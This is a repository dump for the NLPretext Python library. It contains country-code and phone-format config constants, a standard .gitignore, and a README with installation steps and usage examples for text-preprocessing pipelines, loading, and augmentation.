301 | "SX",
302 | "TC",
303 | "TT",
304 | "VC",
305 | "VG",
306 | "VI",
307 | "RU",
308 | "KZ",
309 | "EG",
310 | "ZA",
311 | "GR",
312 | "NL",
313 | "BE",
314 | "FR",
315 | "ES",
316 | "HU",
317 | "IT",
318 | "VA",
319 | "RO",
320 | "CH",
321 | "AT",
322 | "GB",
323 | "GG",
324 | "IM",
325 | "JE",
326 | "DK",
327 | "SE",
328 | "NO",
329 | "SJ",
330 | "PL",
331 | "DE",
332 | "PE",
333 | "MX",
334 | "CU",
335 | "AR",
336 | "BR",
337 | "CL",
338 | "CO",
339 | "VE",
340 | "MY",
341 | "AU",
342 | "CC",
343 | "CX",
344 | "ID",
345 | "PH",
346 | "NZ",
347 | "SG",
348 | "TH",
349 | "JP",
350 | "KR",
351 | "VN",
352 | "CN",
353 | "TR",
354 | "IN",
355 | "PK",
356 | "AF",
357 | "LK",
358 | "MM",
359 | "IR",
360 | "SS",
361 | "MA",
362 | "EH",
363 | "DZ",
364 | "TN",
365 | "LY",
366 | "GM",
367 | "SN",
368 | "MR",
369 | "ML",
370 | "GN",
371 | "CI",
372 | "BF",
373 | "NE",
374 | "TG",
375 | "BJ",
376 | "MU",
377 | "LR",
378 | "SL",
379 | "GH",
380 | "NG",
381 | "TD",
382 | "CF",
383 | "CM",
384 | "CV",
385 | "ST",
386 | "GQ",
387 | "GA",
388 | "CG",
389 | "CD",
390 | "AO",
391 | "GW",
392 | "IO",
393 | "AC",
394 | "SC",
395 | "SD",
396 | "RW",
397 | "ET",
398 | "SO",
399 | "DJ",
400 | "KE",
401 | "TZ",
402 | "UG",
403 | "BI",
404 | "MZ",
405 | "ZM",
406 | "MG",
407 | "RE",
408 | "YT",
409 | "ZW",
410 | "NA",
411 | "MW",
412 | "LS",
413 | "BW",
414 | "SZ",
415 | "KM",
416 | "SH",
417 | "TA",
418 | "ER",
419 | "AW",
420 | "FO",
421 | "GL",
422 | "GI",
423 | "PT",
424 | "LU",
425 | "IE",
426 | "IS",
427 | "AL",
428 | "MT",
429 | "CY",
430 | "FI",
431 | "AX",
432 | "BG",
433 | "LT",
434 | "LV",
435 | "EE",
436 | "MD",
437 | "AM",
438 | "BY",
439 | "AD",
440 | "MC",
441 | "SM",
442 | "UA",
443 | "RS",
444 | "ME",
445 | "XK",
446 | "HR",
447 | "SI",
448 | "BA",
449 | "MK",
450 | "CZ",
451 | "SK",
452 | "LI",
453 | "FK",
454 | "BZ",
455 | "GT",
456 | "SV",
457 | "HN",
458 | "NI",
459 | "CR",
460 | "PA",
461 | "PM",
462 | "HT",
463 | "GP",
464 | "BL",
465 | "MF",
466 | "BO",
467 | "GY",
468 | "EC",
469 | "GF",
470 | "PY",
471 | "MQ",
472 | "SR",
473 | "UY",
474 | "CW",
475 | "BQ",
476 | "TL",
477 | "NF",
478 | "BN",
479 | "NR",
480 | "PG",
481 | "TO",
482 | "SB",
483 | "VU",
484 | "FJ",
485 | "PW",
486 | "WF",
487 | "CK",
488 | "NU",
489 | "WS",
490 | "KI",
491 | "NC",
492 | "TV",
493 | "PF",
494 | "TK",
495 | "FM",
496 | "MH",
497 | "KP",
498 | "HK",
499 | "MO",
500 | "KH",
501 | "LA",
502 | "BD",
503 | "TW",
504 | "MV",
505 | "LB",
506 | "JO",
507 | "SY",
508 | "IQ",
509 | "KW",
510 | "SA",
511 | "YE",
512 | "OM",
513 | "PS",
514 | "AE",
515 | "IL",
516 | "BH",
517 | "QA",
518 | "BT",
519 | "MN",
520 | "NP",
521 | "TJ",
522 | "TM",
523 | "AZ",
524 | "GE",
525 | "KG",
526 | "UZ",
527 | "DO",
528 | ]
529 |
530 | FORMAT_NUMBERS = {
531 | "E164": _phonenumbers.PhoneNumberFormat.E164,
532 | "INTERNATIONAL": _phonenumbers.PhoneNumberFormat.INTERNATIONAL,
533 | "NATIONAL": _phonenumbers.PhoneNumberFormat.NATIONAL,
534 | "RFC3966": _phonenumbers.PhoneNumberFormat.RFC3966,
535 | }
536 |
--------------------------------------------------------------------------------
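A short sketch of how the phone-number constants above combine with the
phonenumbers package; the number is a fictional French placeholder:

    import phonenumbers

    from nlpretext._config.config import FORMAT_NUMBERS, SUPPORTED_COUNTRY

    parsed = phonenumbers.parse("+33 6 12 34 56 78", "FR")
    print(phonenumbers.format_number(parsed, FORMAT_NUMBERS["E164"]))  # +33612345678
    assert "FR" in SUPPORTED_COUNTRY

--------------------------------------------------------------------------------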
/.gitignore:
--------------------------------------------------------------------------------
1 | # Created by https://www.gitignore.io/api/osx,python,pycharm,windows,visualstudio,visualstudiocode
2 | # Edit at https://www.gitignore.io/?templates=osx,python,pycharm,windows,visualstudio,visualstudiocode
3 |
4 | ### OSX ###
5 | # General
6 | .DS_Store
7 | .AppleDouble
8 | .LSOverride
9 |
10 | # Icon must end with two \r
11 | Icon
12 |
13 | # Thumbnails
14 | ._*
15 |
16 | # Files that might appear in the root of a volume
17 | .DocumentRevisions-V100
18 | .fseventsd
19 | .Spotlight-V100
20 | .TemporaryItems
21 | .Trashes
22 | .VolumeIcon.icns
23 | .com.apple.timemachine.donotpresent
24 |
25 | # Directories potentially created on remote AFP share
26 | .AppleDB
27 | .AppleDesktop
28 | Network Trash Folder
29 | Temporary Items
30 | .apdisk
31 |
32 | ### PyCharm ###
33 | # Covers JetBrains IDEs: IntelliJ, RubyMine, PhpStorm, AppCode, PyCharm, CLion, Android Studio and WebStorm
34 | # Reference: https://intellij-support.jetbrains.com/hc/en-us/articles/206544839
35 |
36 | # User-specific stuff
37 | .idea/
38 | .idea/**/workspace.xml
39 | .idea/**/tasks.xml
40 | .idea/**/usage.statistics.xml
41 | .idea/**/dictionaries
42 | .idea/**/shelf
43 |
44 | # Generated files
45 | .idea/**/contentModel.xml
46 |
47 | # Sensitive or high-churn files
48 | .idea/**/dataSources/
49 | .idea/**/dataSources.ids
50 | .idea/**/dataSources.local.xml
51 | .idea/**/sqlDataSources.xml
52 | .idea/**/dynamic.xml
53 | .idea/**/uiDesigner.xml
54 | .idea/**/dbnavigator.xml
55 |
56 | # Gradle
57 | .idea/**/gradle.xml
58 | .idea/**/libraries
59 |
60 | # Gradle and Maven with auto-import
61 | # When using Gradle or Maven with auto-import, you should exclude module files,
62 | # since they will be recreated, and may cause churn. Uncomment if using
63 | # auto-import.
64 | # .idea/modules.xml
65 | # .idea/*.iml
66 | # .idea/modules
67 | # *.iml
68 | # *.ipr
69 |
70 | # CMake
71 | cmake-build-*/
72 |
73 | # Mongo Explorer plugin
74 | .idea/**/mongoSettings.xml
75 |
76 | # File-based project format
77 | *.iws
78 |
79 | # IntelliJ
80 | out/
81 |
82 | # mpeltonen/sbt-idea plugin
83 | .idea_modules/
84 |
85 | # JIRA plugin
86 | atlassian-ide-plugin.xml
87 |
88 | # Cursive Clojure plugin
89 | .idea/replstate.xml
90 |
91 | # Crashlytics plugin (for Android Studio and IntelliJ)
92 | com_crashlytics_export_strings.xml
93 | crashlytics.properties
94 | crashlytics-build.properties
95 | fabric.properties
96 |
97 | # Editor-based Rest Client
98 | .idea/httpRequests
99 |
100 | # Android studio 3.1+ serialized cache file
101 | .idea/caches/build_file_checksums.ser
102 |
103 | ### PyCharm Patch ###
104 | # Comment Reason: https://github.com/joeblau/gitignore.io/issues/186#issuecomment-215987721
105 |
106 | # *.iml
107 | # modules.xml
108 | # .idea/misc.xml
109 | # *.ipr
110 |
111 | # Sonarlint plugin
112 | .idea/**/sonarlint/
113 |
114 | # SonarQube Plugin
115 | .idea/**/sonarIssues.xml
116 |
117 | # Markdown Navigator plugin
118 | .idea/**/markdown-navigator.xml
119 | .idea/**/markdown-navigator/
120 |
121 | ### Python ###
122 | # Byte-compiled / optimized / DLL files
123 | __pycache__/
124 | *.py[cod]
125 | *$py.class
126 |
127 | # C extensions
128 | *.so
129 |
130 | # Distribution / packaging
131 | .Python
132 | env/
133 | build/
134 | develop-eggs/
135 | dist/
136 | downloads/
137 | eggs/
138 | .eggs/
139 | lib/
140 | lib64/
141 | parts/
142 | sdist/
143 | var/
144 | wheels/
145 | pip-wheel-metadata/
146 | share/python-wheels/
147 | *.egg-info/
148 | .installed.cfg
149 | *.egg
150 | MANIFEST
151 |
152 | # PyInstaller
153 | # Usually these files are written by a python script from a template
154 | # before PyInstaller builds the exe, so as to inject date/other infos into it.
155 | *.manifest
156 | *.spec
157 |
158 | # Installer logs
159 | pip-log.txt
160 | pip-delete-this-directory.txt
161 |
162 | # Unit test / coverage reports
163 | htmlcov/
164 | .tox/
165 | .nox/
166 | .coverage
167 | .coverage.*
168 | .cache
169 | nosetests.xml
170 | coverage.xml
171 | *.cover
172 | .hypothesis/
173 | .pytest_cache/
174 | .ruff_cache/
175 |
176 | # Translations
177 | *.mo
178 | *.pot
179 |
180 | # Scrapy stuff:
181 | .scrapy
182 |
183 | # Django stuff:
184 | *.log
185 |
186 | # Sphinx documentation
187 | docs/_build/
188 |
189 | # PyBuilder
190 | target/
191 |
192 | # pyenv
193 | .python-version
194 |
195 | # poetry
196 | .venv
197 |
198 | # pipenv
199 | # According to pypa/pipenv#598, it is recommended to include Pipfile.lock in version control.
200 | # However, in case of collaboration, if having platform-specific dependencies or dependencies
201 | # having no cross-platform support, pipenv may install dependencies that don't work, or not
202 | # install all needed dependencies.
203 | #Pipfile.lock
204 |
205 | # celery beat schedule file
206 | celerybeat-schedule
207 |
208 | # SageMath parsed files
209 | *.sage.py
210 |
211 | # Spyder project settings
212 | .spyderproject
213 | .spyproject
214 |
215 | # Rope project settings
216 | .ropeproject
217 |
218 | # Mr Developer
219 | .mr.developer.cfg
220 | .project
221 | .pydevproject
222 |
223 | # mkdocs documentation
224 | /site
225 |
226 | # mypy
227 | .mypy_cache/
228 | .dmypy.json
229 | dmypy.json
230 |
231 | # Pyre type checker
232 | .pyre/
233 |
234 | # Plugins
235 | .secrets.baseline
236 |
237 | ### VisualStudioCode ###
238 | .vscode/*
239 | !.vscode/tasks.json
240 | !.vscode/launch.json
241 | !.vscode/extensions.json
242 |
243 | ### VisualStudioCode Patch ###
244 | # Ignore all local history of files
245 | .history
246 |
247 | ### Windows ###
248 | # Windows thumbnail cache files
249 | Thumbs.db
250 | Thumbs.db:encryptable
251 | ehthumbs.db
252 | ehthumbs_vista.db
253 |
254 | # Dump file
255 | *.stackdump
256 |
257 | # Folder config file
258 | [Dd]esktop.ini
259 |
260 | # Recycle Bin used on file shares
261 | $RECYCLE.BIN/
262 |
263 | # Windows Installer files
264 | *.cab
265 | *.msi
266 | *.msix
267 | *.msm
268 | *.msp
269 |
270 | # Windows shortcuts
271 | *.lnk
272 |
273 | ### VisualStudio ###
274 | ## Ignore Visual Studio temporary files, build results, and
275 | ## files generated by popular Visual Studio add-ons.
276 | ##
277 | ## Get latest from https://github.com/github/gitignore/blob/master/VisualStudio.gitignore
278 |
279 | # User-specific files
280 | *.rsuser
281 | *.suo
282 | *.user
283 | *.userosscache
284 | *.sln.docstates
285 |
286 | # User-specific files (MonoDevelop/Xamarin Studio)
287 | *.userprefs
288 |
289 | # Mono auto generated files
290 | mono_crash.*
291 |
292 | # Build results
293 | [Dd]ebug/
294 | [Dd]ebugPublic/
295 | [Rr]elease/
296 | [Rr]eleases/
297 | x64/
298 | x86/
299 | [Aa][Rr][Mm]/
300 | [Aa][Rr][Mm]64/
301 | bld/
302 | [Bb]in/
303 | [Oo]bj/
304 | [Ll]og/
305 |
306 | # Visual Studio 2015/2017 cache/options directory
307 | .vs/
308 | # Uncomment if you have tasks that create the project's static files in wwwroot
309 | #wwwroot/
310 |
311 | # Visual Studio 2017 auto generated files
312 | Generated\ Files/
313 |
314 | # MSTest test Results
315 | [Tt]est[Rr]esult*/
316 | [Bb]uild[Ll]og.*
317 |
318 | # NUnit
319 | *.VisualState.xml
320 | TestResult.xml
321 | nunit-*.xml
322 |
323 | # Build Results of an ATL Project
324 | [Dd]ebugPS/
325 | [Rr]eleasePS/
326 | dlldata.c
327 |
328 | # Benchmark Results
329 | BenchmarkDotNet.Artifacts/
330 |
331 | # .NET Core
332 | project.lock.json
333 | project.fragment.lock.json
334 | artifacts/
335 |
336 | # StyleCop
337 | StyleCopReport.xml
338 |
339 | # Files built by Visual Studio
340 | *_i.c
341 | *_p.c
342 | *_h.h
343 | *.ilk
344 | *.obj
345 | *.iobj
346 | *.pch
347 | *.pdb
348 | *.ipdb
349 | *.pgc
350 | *.pgd
351 | *.rsp
352 | *.sbr
353 | *.tlb
354 | *.tli
355 | *.tlh
356 | *.tmp
357 | *.tmp_proj
358 | *_wpftmp.csproj
359 | *.vspscc
360 | *.vssscc
361 | .builds
362 | *.pidb
363 | *.svclog
364 | *.scc
365 |
366 | # Chutzpah Test files
367 | _Chutzpah*
368 |
369 | # Visual C++ cache files
370 | ipch/
371 | *.aps
372 | *.ncb
373 | *.opendb
374 | *.opensdf
375 | *.sdf
376 | *.cachefile
377 | *.VC.db
378 | *.VC.VC.opendb
379 |
380 | # Visual Studio profiler
381 | *.psess
382 | *.vsp
383 | *.vspx
384 | *.sap
385 |
386 | # Visual Studio Trace Files
387 | *.e2e
388 |
389 | # TFS 2012 Local Workspace
390 | $tf/
391 |
392 | # Guidance Automation Toolkit
393 | *.gpState
394 |
395 | # ReSharper is a .NET coding add-in
396 | _ReSharper*/
397 | *.[Rr]e[Ss]harper
398 | *.DotSettings.user
399 |
400 | # JustCode is a .NET coding add-in
401 | .JustCode
402 |
403 | # TeamCity is a build add-in
404 | _TeamCity*
405 |
406 | # DotCover is a Code Coverage Tool
407 | *.dotCover
408 |
409 | # AxoCover is a Code Coverage Tool
410 | .axoCover/*
411 | !.axoCover/settings.json
412 |
413 | # Visual Studio code coverage results
414 | *.coverage
415 | *.coveragexml
416 |
417 | # NCrunch
418 | _NCrunch_*
419 | .*crunch*.local.xml
420 | nCrunchTemp_*
421 |
422 | # MightyMoose
423 | *.mm.*
424 | AutoTest.Net/
425 |
426 | # Web workbench (sass)
427 | .sass-cache/
428 |
429 | # Installshield output folder
430 | [Ee]xpress/
431 |
432 | # DocProject is a documentation generator add-in
433 | DocProject/buildhelp/
434 | DocProject/Help/*.HxT
435 | DocProject/Help/*.HxC
436 | DocProject/Help/*.hhc
437 | DocProject/Help/*.hhk
438 | DocProject/Help/*.hhp
439 | DocProject/Help/Html2
440 | DocProject/Help/html
441 |
442 | # Click-Once directory
443 | publish/
444 |
445 | # Publish Web Output
446 | *.[Pp]ublish.xml
447 | *.azurePubxml
448 | # Note: Comment the next line if you want to checkin your web deploy settings,
449 | # but database connection strings (with potential passwords) will be unencrypted
450 | *.pubxml
451 | *.publishproj
452 |
453 | # Microsoft Azure Web App publish settings. Comment the next line if you want to
454 | # checkin your Azure Web App publish settings, but sensitive information contained
455 | # in these scripts will be unencrypted
456 | PublishScripts/
457 |
458 | # NuGet Packages
459 | *.nupkg
460 | # NuGet Symbol Packages
461 | *.snupkg
462 | # The packages folder can be ignored because of Package Restore
463 | **/[Pp]ackages/*
464 | # except build/, which is used as an MSBuild target.
465 | !**/[Pp]ackages/build/
466 | # Uncomment if necessary however generally it will be regenerated when needed
467 | #!**/[Pp]ackages/repositories.config
468 | # NuGet v3's project.json files produces more ignorable files
469 | *.nuget.props
470 | *.nuget.targets
471 |
472 | # Microsoft Azure Build Output
473 | csx/
474 | *.build.csdef
475 |
476 | # Microsoft Azure Emulator
477 | ecf/
478 | rcf/
479 |
480 | # Windows Store app package directories and files
481 | AppPackages/
482 | BundleArtifacts/
483 | Package.StoreAssociation.xml
484 | _pkginfo.txt
485 | *.appx
486 | *.appxbundle
487 | *.appxupload
488 |
489 | # Visual Studio cache files
490 | # files ending in .cache can be ignored
491 | *.[Cc]ache
492 | # but keep track of directories ending in .cache
493 | !?*.[Cc]ache/
494 |
495 | # Others
496 | ClientBin/
497 | ~$*
498 | *~
499 | *.dbmdl
500 | *.dbproj.schemaview
501 | *.jfm
502 | *.pfx
503 | *.publishsettings
504 | orleans.codegen.cs
505 |
506 | # Including strong name files can present a security risk
507 | # (https://github.com/github/gitignore/pull/2483#issue-259490424)
508 | #*.snk
509 |
510 | # Since there are multiple workflows, uncomment next line to ignore bower_components
511 | # (https://github.com/github/gitignore/pull/1529#issuecomment-104372622)
512 | #bower_components/
513 |
514 | # RIA/Silverlight projects
515 | Generated_Code/
516 |
517 | # Backup & report files from converting an old project file
518 | # to a newer Visual Studio version. Backup files are not needed,
519 | # because we have git ;-)
520 | _UpgradeReport_Files/
521 | Backup*/
522 | UpgradeLog*.XML
523 | UpgradeLog*.htm
524 | ServiceFabricBackup/
525 | *.rptproj.bak
526 |
527 | # SQL Server files
528 | *.mdf
529 | *.ldf
530 | *.ndf
531 |
532 | # Business Intelligence projects
533 | *.rdl.data
534 | *.bim.layout
535 | *.bim_*.settings
536 | *.rptproj.rsuser
537 | *- [Bb]ackup.rdl
538 | *- [Bb]ackup ([0-9]).rdl
539 | *- [Bb]ackup ([0-9][0-9]).rdl
540 |
541 | # Microsoft Fakes
542 | FakesAssemblies/
543 |
544 | # GhostDoc plugin setting file
545 | *.GhostDoc.xml
546 |
547 | # Node.js Tools for Visual Studio
548 | .ntvs_analysis.dat
549 | node_modules/
550 |
551 | # Visual Studio 6 build log
552 | *.plg
553 |
554 | # Visual Studio 6 workspace options file
555 | *.opt
556 |
557 | # Visual Studio 6 auto-generated workspace file (contains which files were open etc.)
558 | *.vbw
559 |
560 | # Visual Studio LightSwitch build output
561 | **/*.HTMLClient/GeneratedArtifacts
562 | **/*.DesktopClient/GeneratedArtifacts
563 | **/*.DesktopClient/ModelManifest.xml
564 | **/*.Server/GeneratedArtifacts
565 | **/*.Server/ModelManifest.xml
566 | _Pvt_Extensions
567 |
568 | # Paket dependency manager
569 | .paket/paket.exe
570 | paket-files/
571 |
572 | # FAKE - F# Make
573 | .fake/
574 |
575 | # CodeRush personal settings
576 | .cr/personal
577 |
578 | # Python Tools for Visual Studio (PTVS)
579 | *.pyc
580 |
581 | # Cake - Uncomment if you are using it
582 | # tools/**
583 | # !tools/packages.config
584 |
585 | # Tabs Studio
586 | *.tss
587 |
588 | # Telerik's JustMock configuration file
589 | *.jmconfig
590 |
591 | # BizTalk build output
592 | *.btp.cs
593 | *.btm.cs
594 | *.odx.cs
595 | *.xsd.cs
596 |
597 | # OpenCover UI analysis results
598 | OpenCover/
599 |
600 | # Azure Stream Analytics local run output
601 | ASALocalRun/
602 |
603 | # MSBuild Binary and Structured Log
604 | *.binlog
605 |
606 | # NVidia Nsight GPU debugger configuration file
607 | *.nvuser
608 |
609 | # MFractors (Xamarin productivity tool) working folder
610 | .mfractor/
611 |
612 | # Local History for Visual Studio
613 | .localhistory/
614 |
615 | # BeatPulse healthcheck temp database
616 | healthchecksdb
617 |
618 | # Backup folder for Package Reference Convert tool in Visual Studio 2017
619 | MigrationBackup/
620 |
621 | # DotEnv configuration
622 | .env
623 |
624 | # Database
625 | *.db
626 | *.rdb
627 |
628 | # Pycharm
629 | .idea
630 | venv/
631 |
632 | # VS Code
633 | .vscode/
634 |
635 | # Spyder
636 | .spyproject/
637 |
638 | # Jupyter NB Checkpoints
639 | .ipynb_checkpoints/
640 |
641 | # exclude data from source control by default
642 | data/
643 |
644 | # vim
645 | *.swp
646 | *.swo
647 |
648 |
649 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # NLPretext
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 | [](https://github.com/artefactory/NLPretext/actions/workflows/ci.yml?query=branch%3Amain)
10 | [](https://github.com/artefactory/NLPretext/actions/workflows/cd.yml?query=event%3Arelease)
11 | [](#supported-python-versions)
12 | [](https://github.com/artefactory/NLPretext/pulls?utf8=%E2%9C%93&q=is%3Apr%20author%3Aapp%2Fdependabot)
13 |
14 | [](https://github.com/psf/black)
15 | [](https://github.com/PyCQA/bandit)
16 | [](https://github.com/artefactory/NLPretext/blob/main/.pre-commit-config.yaml)
17 | [](https://github.com/artefactory/NLPretext/releases)
18 | [](https://github.com/artefactory/NLPretext/tree/main/docs)
19 | [](https://github.com/artefactory/NLPretext/blob/main/LICENSE)
20 |
21 | All the go-to functions you need to handle NLP use-cases, integrated in NLPretext
22 |
23 |
24 |
25 | # TL;DR
26 |
27 |
28 | > *Working on an NLP project and tired of always looking for the same silly preprocessing functions on the web?* :tired_face:
29 |
30 | > *Need to efficiently extract email addresses from a document? Hashtags from tweets? Remove accents from a French post?* :disappointed_relieved:
31 |
32 |
33 | **NLPretext got you covered!** :rocket:
34 |
35 | NLPretext gathers in a **single** library all the text **preprocessing** functions you need to **ease** your NLP project.
36 |
37 |
38 | :mag: Quickly explore our preprocessing pipelines and the individual function reference below.
39 |
40 | * [Default preprocessing pipeline](#default_pipeline)
41 | * [Custom preprocessing pipeline](#custom_pipeline)
42 | * [Replacing phone numbers](#replace_phone_numbers)
43 | * [Removing hashtags](#remove_hashtags)
44 | * [Extracting emojis](#extract_emojis)
45 | * [Data augmentation](#data_augmentation)
46 |
47 |
48 | Cannot find what you were looking for? Feel free to open an [issue](https://github.com/artefactory/nlpretext/issues).
49 |
50 |
51 |
52 | # Installation
53 |
54 | ### Supported Python Versions
55 |
56 | - Main supported version: `3.8`
57 | - Other supported versions: `3.9`, `3.10`
58 |
59 |
60 | We strongly advise you to do the remaining steps in a virtual environment.
61 |
62 | To install this library from PyPi, run the following command:
63 |
64 | ```bash
65 | pip install nlpretext
66 | ```
67 |
68 | or with `Poetry`
69 |
70 | ```bash
71 | poetry add nlpretext
72 | ```
73 |
74 |
75 | # Usage
76 |
77 | ## Default pipeline
78 |
79 | Need to preprocess your text data but no clue about which functions to use and in which order? The default preprocessing pipeline got you covered:
80 |
81 | ```python
82 | from nlpretext import Preprocessor
83 | text = "I just got the best dinner in my life @latourdargent !!! I recommend 😀 #food #paris \n"
84 | preprocessor = Preprocessor()
85 | text = preprocessor.run(text)
86 | print(text)
87 | # "I just got the best dinner in my life!!! I recommend"
88 | ```
89 |
90 | ## Create your custom pipeline
91 |
92 | Another possibility is to create your own custom pipeline if you know exactly which functions to apply to your data; here's an example:
93 |
94 | ```python
95 | from nlpretext import Preprocessor
96 | from nlpretext.basic.preprocess import (normalize_whitespace, remove_punct, remove_eol_characters,
97 | remove_stopwords, lower_text)
98 | from nlpretext.social.preprocess import remove_mentions, remove_hashtag, remove_emoji
99 | text = "I just got the best dinner in my life @latourdargent !!! I recommend 😀 #food #paris \n"
100 | preprocessor = Preprocessor()
101 | preprocessor.pipe(lower_text)
102 | preprocessor.pipe(remove_mentions)
103 | preprocessor.pipe(remove_hashtag)
104 | preprocessor.pipe(remove_emoji)
105 | preprocessor.pipe(remove_eol_characters)
106 | preprocessor.pipe(remove_stopwords, args={'lang': 'en'})
107 | preprocessor.pipe(remove_punct)
108 | preprocessor.pipe(normalize_whitespace)
109 | text = preprocessor.run(text)
110 | print(text)
111 | # "dinner life recommend"
112 | ```
113 |
114 | Take a look at all the available functions [here](https://github.com/artefactory/NLPretext/tree/master/nlpretext), in the ```preprocess.py``` scripts of the basic, social, and token folders.
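
Token-level helpers work on lists of tokens rather than raw strings. Here is a minimal sketch, assuming the `remove_smallwords` function from the token module (check the linked scripts for exact names and signatures):

```python
from nlpretext.token.preprocess import remove_smallwords

tokens = ["a", "magnificent", "dinner", "in", "paris"]
tokens = remove_smallwords(tokens, smallwords_threshold=3)
print(tokens)
# e.g. ['magnificent', 'dinner', 'paris'] (tokens shorter than the threshold are dropped)
```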
115 |
116 |
117 | ## Load text data
118 |
119 | Pre-processing text data is useful only if you have loaded data to process! Importing text data as strings in your code can be really simple if you have short texts in a local .txt file, but it quickly becomes difficult when you want to load many texts, stored in multiple formats and split across multiple files. Fortunately, you can use NLPretext's TextLoader class to easily import text data.
120 | While it is not mandatory, our TextLoader works best with Dask; make sure the library is installed if you want the best performance.
121 |
122 | ```python
123 | from nlpretext.textloader import TextLoader
124 | files_path = "local_folder/texts/text.txt"
125 | text_loader = TextLoader(use_dask=True)
126 | text_dataframe = text_loader.read_text(files_path)
127 | print(text_dataframe.text.values.tolist())
128 | # ["I just got the best dinner in my life!!!", "I recommend", "It was awesome"]
129 | ```
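
If Dask is not installed, you can disable it. A minimal sketch, assuming the `use_dask` flag falls back to pandas-based loading when set to `False`:

```python
from nlpretext.textloader import TextLoader

text_loader = TextLoader(use_dask=False)  # assumption: falls back to a pandas loader
text_dataframe = text_loader.read_text("local_folder/texts/text.txt")
```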
130 |
131 | File paths can be provided as a string or a list of strings, with or without wildcards. Imports from cloud providers are also supported, provided your machine is authenticated on the project.
132 |
133 | ```python
134 | text_loader = TextLoader(text_column="name_of_text_column_in_your_data")
135 |
136 | local_file_path = "local_folder/texts/text.csv" # File from local folder
137 | local_corpus_path = ["local_folder/texts/text_1.csv", "local_folder/texts/text_2.csv", "local_folder/texts/text_3.csv"] # Multiple files from local folder
138 |
139 | gcs_file_path = "gs://my-bucket/texts/text.json" # File from GCS
140 | s3_file_path = "s3://my-bucket/texts/text.json" # File from S3
141 | hdfs_file_path = "hdfs://folder/texts/text.txt" # File from HDFS
142 | azure_file_path = "az://my-bucket/texts/text.parquet" # File from Azure
143 |
144 | gcs_corpus_path = "gs://my-bucket/texts/text_*.json" # Multiple files from GCS with wildcard
145 |
146 | text_dataframe_1 = text_loader.read_text(local_file_path)
147 | text_dataframe_2 = text_loader.read_text(local_corpus_path)
148 | text_dataframe_3 = text_loader.read_text(gcs_file_path)
149 | text_dataframe_4 = text_loader.read_text(s3_file_path)
150 | text_dataframe_5 = text_loader.read_text(hdfs_file_path)
151 | text_dataframe_6 = text_loader.read_text(azure_file_path)
152 | text_dataframe_7 = text_loader.read_text(gcs_corpus_path)
153 |
154 | ```
155 |
156 | You can also specify a Preprocessor if you want your data to be directly pre-processed when loaded.
157 | ```python
158 | text_loader = TextLoader(text_column="text_col")
159 | preprocessor = Preprocessor()
160 |
161 | local_file_path = "local_folder/texts/text.csv" # File from local folder
162 |
163 | raw_text_dataframe = text_loader.read_text(local_file_path)
164 | preprocessed_text_dataframe = text_loader.read_text(local_file_path, preprocessor=preprocessor)
165 |
166 | print(raw_text_dataframe.text_col.values.tolist())
167 | # ["These texts are not preprocessed", "This is bad ## "]
168 |
169 | print(preprocessed_text_dataframe.text_col.values.tolist())
170 | # ["These texts are not preprocessed", "This is bad"]
171 | ```
172 |
173 |
174 | ## Individual Functions
175 |
176 | ### Replacing emails
177 |
178 | ```python
179 | from nlpretext.basic.preprocess import replace_emails
180 | example = "I have forwarded this email to obama@whitehouse.gov"
181 | example = replace_emails(example, replace_with="*EMAIL*")
182 | print(example)
183 | # "I have forwarded this email to *EMAIL*"
184 | ```
185 |
186 | ### Replacing phone numbers
187 |
188 | ```python
189 | from nlpretext.basic.preprocess import replace_phone_numbers
190 | example = "My phone number is 0606060606"
191 | example = replace_phone_numbers(example, country_to_detect=["FR"], replace_with="*PHONE*")
192 | print(example)
193 | # "My phone number is *PHONE*"
194 | ```
195 |
196 | ### Removing Hashtags
197 |
198 | ```python
199 | from nlpretext.social.preprocess import remove_hashtag
200 | example = "This restaurant was amazing #food #foodie #foodstagram #dinner"
201 | example = remove_hashtag(example)
202 | print(example)
203 | # "This restaurant was amazing"
204 | ```
205 |
206 | ### Extracting emojis
207 |
208 | ```python
209 | from nlpretext.social.preprocess import extract_emojis
210 | example = "I take care of my skin 😀"
211 | example = extract_emojis(example)
212 | print(example)
213 | # [':grinning_face:']
214 | ```
215 |
216 | ## Data augmentation
217 |
218 | The augmentation module helps you to **generate new texts** based on your given examples by modifying some words in the initial ones and to **keep associated entities unchanged**, if any, in the case of **NER tasks**. If you want words other than entities to remain unchanged, you can specify it within the `stopwords` argument. Modifications depend on the chosen method, the ones currently supported by the module are **substitutions with synonyms** using Wordnet or BERT from the [`nlpaug`](https://github.com/makcedward/nlpaug) library.
219 |
220 | ```python
221 | from nlpretext.augmentation.text_augmentation import augment_text
222 | example = "I want to buy a small black handbag please."
223 | entities = [{'entity': 'Color', 'word': 'black', 'startCharIndex': 22, 'endCharIndex': 27}]
224 | example = augment_text(example, method="wordnet_synonym", entities=entities)
225 | print(example)
226 | # "I need to buy a small black pocketbook please."
227 | ```
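
If words other than entities must also stay unchanged, list them in the `stopwords` argument. A minimal sketch, assuming `augment_text` accepts `stopwords` alongside `entities` as described above:

```python
from nlpretext.augmentation.text_augmentation import augment_text

example = "I want to buy a small black handbag please."
entities = [{'entity': 'Color', 'word': 'black', 'startCharIndex': 22, 'endCharIndex': 27}]
# assumption: "handbag" is protected from substitution, in addition to the "black" entity
example = augment_text(example, method="wordnet_synonym", entities=entities, stopwords=["handbag"])
print(example)
# e.g. "I need to buy a small black handbag please."
```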
228 |
229 |
230 |
231 |
232 | # 📈 Releases
233 |
234 | You can see the list of available releases on the [GitHub Releases](https://github.com/artefactory/NLPretext}/releases) page.
235 |
236 | We follow [Semantic Versions](https://semver.org/) specification.
237 |
238 | We use [`Release Drafter`](https://github.com/marketplace/actions/release-drafter). As pull requests are merged, a draft release is kept up to date with the changes, ready to publish whenever you are. With the categories option, you can categorize pull requests in release notes using labels.
239 |
240 | For pull requests, these labels are configured by default:
241 |
242 | | **Label** | **Title in Releases** |
243 | | :-----------------------------------: | :---------------------: |
244 | | `enhancement`, `feature` | 🚀 Features |
245 | | `bug`, `refactoring`, `bugfix`, `fix` | 🔧 Fixes & Refactoring |
246 | | `build`, `ci`, `testing` | 📦 Build System & CI/CD |
247 | | `breaking` | 💥 Breaking Changes |
248 | | `documentation` | 📝 Documentation |
249 | | `dependencies` | ⬆️ Dependencies updates |
250 |
251 |
252 | GitHub creates the `bug`, `enhancement`, and `documentation` labels automatically. Dependabot creates the `dependencies` label. Create the remaining labels on the Issues tab of the GitHub repository when needed.

## 🛡 License
253 |
